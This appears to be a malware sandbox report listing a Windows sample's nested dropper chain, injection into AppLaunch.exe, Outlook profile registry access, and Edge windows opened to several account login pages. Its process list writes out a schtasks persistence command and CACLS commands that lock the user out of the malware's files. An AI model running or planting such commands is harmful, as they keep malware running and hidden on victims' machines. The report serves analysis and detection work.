PID 4884 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\478fba5ae931b66d2404c146c83df1d1cda769f1bfe0dbc672bd8aa23194253b.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe
PID 4884 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\478fba5ae931b66d2404c146c83df1d1cda769f1bfe0dbc672bd8aa23194253b.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe
PID 2488 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe
PID 2488 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe
PID 2488 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe
PID 4748 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe
PID 4748 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe
PID 4748 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe
PID 4072 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe
PID 4072 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe
PID 4072 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe
PID 5036 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe
PID 5036 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe
PID 5036 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe
PID 624 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe
PID 624 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe
PID 624 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3776 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 624 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe
PID 624 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe
PID 624 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4484 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5036 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe
PID 5036 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe
PID 5036 wrote to memory of 4820 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe
PID 4072 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe
PID 4072 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe
PID 4072 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2228 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4748 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe
PID 4748 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe
PID 4748 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe
PID 2736 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2736 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2736 wrote to memory of 3784 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2488 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Nh3ga3.exe
PID 2488 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Nh3ga3.exe
PID 2488 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Nh3ga3.exe
PID 3784 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3784 wrote to memory of 4292 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\799B.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\799B.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\478fba5ae931b66d2404c146c83df1d1cda769f1bfe0dbc672bd8aa23194253b.exe

"C:\Users\Admin\AppData\Local\Temp\478fba5ae931b66d2404c146c83df1d1cda769f1bfe0dbc672bd8aa23194253b.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gi7qY30.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Un0Bw54.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Cz1Ap50.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Di6Ed40.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\wJ1sK15.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1aN98kY9.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xs6783.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3dQ43Ii.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5112 -ip 5112

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4FM756Cb.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5NG1wH2.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Nh3ga3.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Nh3ga3.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7wp9jb68.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7wp9jb68.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CAB2.tmp\CAB3.tmp\CAB4.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7wp9jb68.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x174,0x178,0x17c,0x150,0x180,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x178,0x17c,0x180,0x154,0x184,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,3494031725653989908,8833576856429239654,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,3494031725653989908,8833576856429239654,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffd933d46f8,0x7ffd933d4708,0x7ffd933d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1484,7621116590954060437,3398319035472106575,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2808 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,8827456320347124961,16426203794333473148,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2748 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1484,7621116590954060437,3398319035472106575,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,4062161310967499117,5462985162022928676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

